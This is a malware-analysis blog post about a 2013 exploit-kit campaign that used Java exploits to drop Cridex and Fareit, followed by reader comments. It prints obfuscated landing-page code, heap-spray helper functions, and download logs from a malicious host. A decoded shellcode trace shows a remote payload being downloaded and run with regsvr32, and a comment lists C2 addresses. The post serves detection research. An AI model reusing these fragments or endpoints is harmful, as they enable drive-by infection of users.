67cO!%673a!%d5ec!%3173!%3c9d!%2f86!%52b2!%9e3e!%c5O2!%O1ad!%6983!%3f72!%deb1!%58b2!%964d!%
1e16!%ddb1!%8Ob2!%3ae5!%dde7!%O5b2!%c5d1!%413a!%3ad5!%97e7!%3c46!%971c!%ccd5!%cOda!%fac1!%
d53d!%11e2!%bee6!%8681!%O93a!%7d7d!%d383!%9a6c!%b14O!%b2c5!%6741!%e43a!%b13f!%e5O2!%e73a!%
8543!%423a!%3a86!%8681!%c43a!%b18e!%1c77!%d5c1!%dacc!%ffff!%beff!%5O8e!%afbe!%O42e!%O382!%
efO8!%9eeO!%6618!%139c!%O185!%cfbe!%4ecf!%6638!%1414!%1414!%".split("").reverse().join(""
Some new modification, jar/java callback functions were spotted in PluginDetect:
function getBlockSize(){
  return 1024}
function getAllocSize(){
  return 1024 * 1024}
function getAllocCount(){
  return 300}
function getFillBytes(){
  var a = '%u' + '0c0c';
  return a + a}
A changes eventually also detected only in JARs too: First & second JAR during download (snipped log)
--11:01:49--  h00p://dfudont.ru:8080/forum/links/column.php
           => `column.php.1'
Resolving dfudont.ru... seconds 0.00, 89.111.176.125, 91.224.135.20, 212.112.207.15
Caching dfudont.ru => 89.111.176.125 91.224.135.20 212.112.207.15
Connecting to dfudont.ru|89.111.176.125|:8080... seconds 0.00, connected.
  :
GET /forum/links/column.php HTTP/1.0 (older java request)
Host: dfudont.ru:8080
  :
HTTP request sent, awaiting response...
  :
HTTP/1.1 200 OK
Server: nginx/1.0.4
Date: Fri, 18 Jan 2013 02:01:44 GMT
Content-Type: application/java-archive
Connection: keep-alive
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Content-Length: 16830
ETag: "571e4f2c6881ced7067423592c3a9958"
Last-Modified: Fri, 18 Jan 2013 02:01:44 GMT
Accept-Ranges: bytes
  :
200 OK
Length: 16,830 (16K) [application/java-archive]
11:01:51 (31.60 KB/s) - `try1.jar' saved [16830/16830]

GET /forum/links/column.php HTTP/1.0 (newer java request)
Host: dfudont.ru:8080
  :
HTTP request sent, awaiting response...
  :
HTTP/1.1 200 OK
Server: nginx/1.0.10
Date: Fri, 18 Jan 2013 02:08:09 GMT
Content-Type: application/java-archive
Connection: keep-alive
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Content-Length: 22824
ETag: "1bfec3a52c1b19ee4aaaba0be551c1f1"
Last-Modified: Fri, 18 Jan 2013 02:02:52 GMT
Accept-Ranges: bytes
  :
200 OK
Registered socket 1896 for persistent reuse.
Length: 22,824 (22K) [application/java-archive]
11:02:59 (35.13 KB/s) - `try2.jar' saved [22824/22824]
Both jars are having same previous exploit codes, in try1.jar was detected new obfuscation only: while in (ex-)0day jar/try2.jar was the MD5 changes: New changed sample's Detection Ratio in VT: [Landing Page] [JAR1] [JAR2]

How about the payload?

It is the same as the original post wrote :-) Cridex that dropped Fareit. PoC, translated API of shellcode shows URL:
0x7c801ad9 kernel32.VirtualProtect(lpAddress=0x4020cf, dwSize=255)
0x7c801d7b kernel32.LoadLibraryA(lpFileName=urlmon)
0x7c835dfa kernel32.GetTempPathA(lpBuffer=0x22fc60, nBufferLength=248, [lpBuffer=C:\DOCUME~1\Administrator\LOCALS~1\Temp\])
0x1a494bbe urlmon.URLDownloadToFileA(pCaller=0, szURL=h00p://dfudont.ru:8080/forum/links/column.php?bf=30:1n:1i:1i:33&xe=2v:1k:1m:32:33:1k:1k:31:1j:1o&d=1k&bb=a&hy=m, lpfnCB=0x0, szFileName=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll)
0x7c86250d kernel32.WinExec(lpCmdLine=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)
0x7c86250d kernel32.WinExec(lpCmdLine=regsvr32 -s C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)
0x7c81cb3b kernel32.TerminateThread(dwExitCode=0)
Download logs (snipped):
   :
HTTP request sent, awaiting response...
   :
HTTP/1.1 200 OK
Server: nginx/1.0.4
Date: Fri, 18 Jan 2013 04:35:44 GMT
Content-Type: application/x-msdownload
Connection: keep-alive
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Pragma: public
Expires: Fri, 18 Jan 2013 04:35:44 GMT
Cache-Control: must-revalidate, post-check=0, pre-check=0
Cache-Control: private
Content-Disposition: attachment; filename="calc.exe"
Content-Transfer-Encoding: binary
Content-Length: 197632
  :
200 OK
Registered socket 1896 for persistent reuse.
Length: 197,632 (193K) [application/x-msdownload]
100%[====================================>] 197,632       71.52K/s
13:35:53 (71.40 KB/s) - `calc.exe' saved [197632/197632]
The file:
@unixfreaxjp /malware]$ ls -alF info.exe ; md5 info.exe
-rwxr--r--  1 MMD  toor  197632 Jan 17 01:28 info.exe*
MD5 (info.exe) = f188879d2cc11dae25c6368cd2f4ad96
I guess these moronz didn't have enough time to make new payload, eh? :-) Tick.. tock.. tick.. tock...

Samples

For the research/education about malware & to increase detection rates - we are sharing the samples here -->>[MEDIAFIRE]
#MalwareMustDie!!

4 comments:

  1. Mediafire blocked the download of the files. Very nice analysis of Fareit btw :)

    ReplyDelete
  2. Horgh. Samples are download-able now, just checked.

    ReplyDelete
  3. Replies
    1. At present I can see reload dridex targeted to amazon. I can see that malware tried connect to:
      106.216.219.96:http:
      239.255.255:250
      27.5.199.115:http
      46.19.143.151:http
      5-14-181-219.residential.rdsnet.ro:https
      85-143-166-72.clodo.ru:http
      dhcp-92-cast.dipscfm.uninsubria.it:http
      e-u07kicsg661.it.manchester.ac.uk:http
      ip-195-030.africaonline.com.gh:8000
      ipoter.ru:http
      tengo.un.gato.en.mis.pantalones:http-alt

      Delete